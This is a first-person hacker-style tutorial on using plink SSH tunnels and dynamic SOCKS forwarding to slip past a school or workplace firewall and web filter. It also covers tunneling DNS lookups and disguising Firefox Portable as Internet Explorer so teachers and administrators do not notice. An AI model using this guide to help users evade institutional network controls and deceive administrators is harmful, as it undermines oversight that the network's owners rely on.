For those who have no idea what an SSH tunnel is, imagine that whenever you establish a connection to an SSH server, you are digging an underground tunnel from your location at Point A to the server's location at Point B, through which a messenger carries messages back and forth between you and the server. The tunnel is underground because your connection is encrypted; because of this, people cannot see what is being sent back and forth through your connection (the underground tunnel). Once you have established a connection, you have an entire tunnel to send data back and forth through.

Now, the great thing about this underground tunnel is that it is big enough to fit more than one messenger. As a result, it is possible to send messengers with messages for a server at Point C through the underground tunnel, have them relayed from Point B to Point C, from Point C back to Point B, and then sent through the underground tunnel back to you at Point A.

For a more detailed explanation see the Wikipedia page about Tunneling Protocols: http://en.wikipedia.org/wiki/Tunneling_protocol


[ The Guards ]

Let's assume that the network you are currently on has a server that filters web traffic, and is guarded by a firewall that does not allow inbound connections and only allows outbound connections on ports 21 (FTP), 80 (HTTP), and 443 (HTTPS). How is this information useful, you ask? Well, we know that we can get traffic out on three different ports, which means you have three openings from which to dig a tunnel.


[ Preparation ]

In order to successfully sneak through the firewall/web filter you will need two things:

  • An SSH server outside the network that you control, listening on one of the allowed outbound ports (21, 80, or 443).
  • A copy of plink (the command line SSH client from the PuTTY suite) on the machine you're tunneling from.


[ A Simple Tunnel ]

The command for creating a tunnel with plink is:

plink -N -P PortNumber -L SourcePort:RemoteServer:ServicePort -l UserName SSHServerAddress

For PortNumber, use a port that you have outbound access on. For SourcePort, use any number between 1 and 65535. For RemoteServer, use the IP address of a remote server you would like to access, and for ServicePort, use the port of the service you'd like to access on the remote server.

For example, to tunnel an HTTP connection to a remote server at 72.14.207.99 through an SSH server listening on port 21 at the address 123.123.123.123, the command would look like:

plink -N -P 21 -L 1337:72.14.207.99:80 -l YourUsername 123.123.123.123

Once you have entered your password, open up a web browser, enter http://127.0.0.1:1337 into the address bar, and you will be looking at the Google home page.

NOTE 1: When using the above command syntax, after you have provided your correct password, the blinking cursor will drop a line. This means that your login was successful.

NOTE 2: Tunnels can be used to proxy a connection to any address on any port, however this article will focus on tunneling web pages.


[ Dynamic SOCKS-based Jutsu! ]

While a simple tunnel may be alright for connecting to one specific server, a ninja such as yourself has many different servers to browse, and it is impractical to create a tunnel for each different server you may want to connect to. This is where dynamic SOCKS-based port forwarding comes into play, which in n0n-1337-ninj4 terms is an SSH tunnel similar to the one created in the section above, except that its RemoteServer and ServicePort are dynamic while its SourcePort remains the same.

The command for creating a dynamic tunnel is:

plink -N -P PortNumber -D SourcePort -l UserName SSHServerAddress

Creating a dynamic tunnel is a little less confusing (syntax-wise) than a simple tunnel; however, using it is slightly more complex.


[ Web Browsing Over a Dynamic Tunnel ]

In order to use a web browser over a dynamic tunnel, you need to be able to modify the browser's proxy settings. In your current restricted environment you are unable to modify the settings of your school's/work's web browser (which is Internet Explorer (boo!)). However, this isn't a problem for a ninja like yourself; all you must do is acquire a web browser that you have full control over. You can't leave any trace of using another web browser though (for it is not the ninja way), so installing a new one is out of the question. This is where Firefox Portable (a mobile, install-free version of Firefox) steps in. Download PF from http://portableapps.com/apps/internet/firefox_portable (this article covers using Firefox Portable 2.0) and extract it to a USB jump drive, or to your hard drive for later burning to a CD.

To use PF over a dynamic tunnel: first start PF, click on 'Tools', and choose 'Options'. In the options window, click the button at the top labeled 'Advanced', and under the 'Connection' section click the button labeled 'Settings...'. In the connection settings window, choose the third option, labeled 'Manual proxy configuration:'. In the entry box next to the words 'SOCKS Host' enter 127.0.0.1, and in the entry box to its right enter the SourcePort you used when creating your dynamic tunnel. Make sure that SOCKS v5 is selected and click OK.

PF will now send and receive all traffic over your dynamic tunnel; however, by default PF does DNS lookups locally, which can give away what you are browsing (very un-ninja-like). To configure PF to send DNS lookups over the dynamic tunnel: in the address bar type 'about:config' and hit enter, in the entry box next to the word 'Filter' enter 'network.proxy.socks_remote_dns', then right click the result and select the 'Toggle' option.


[ Cloaking PF to look like IE ]

Well, now you've got a copy of PF using a dynamic tunnel to browse the web, but PF isn't very stealthy, and any passing teacher/administrator will be all over you when they see it. For a ninja, stealth is very important, so your next priority is to configure PF so that it looks like Internet Explorer. You will need the following in order to effectively cloak your copy of PF:

  • Neofox IE 6: https://addons.mozilla.org/firefox/4327/
    A theme that makes PF look like IE 6.0
  • Firesomething: https://addons.mozilla.org/firefox/31/
    An extension that allows you to change the title of the web browser.
    NOTE: you will have to modify the .xpi slightly to make it install with PF 2.0; the steps on how to do this are in the first comment on the page.
  • Internet Explorer XP Icons: http://www.bamm.gabriana.com/cgi-bin/download.pl/package/ieiconsxp.xpi
    An extension that replaces the Firefox icons with the ones used by IE.

Configure Firesomething to change the browser title from "Mozilla Firefox" to "Microsoft Internet Explorer". PF should now at least resemble IE at a passing glance, and with some toolbar and appearance tweaking on your part, no teacher/administrator will spare it a second glance.


[ Final Notes and Closing ]

With your new skills in Network Ninjitsu, no web filter/firewall will stand a chance. For questions and comments, you can contact me at jamespenguin[at]gmail.com.

In case anyone cares, a RAR archive containing the paper, plink, and a modified version of Portable Firefox has been uploaded to the Information Leak server.

Download (RAR - 10Mb)


Copyright © Brandon Smith
ORIGINAL CONTENT DO NOT STEAL KTHX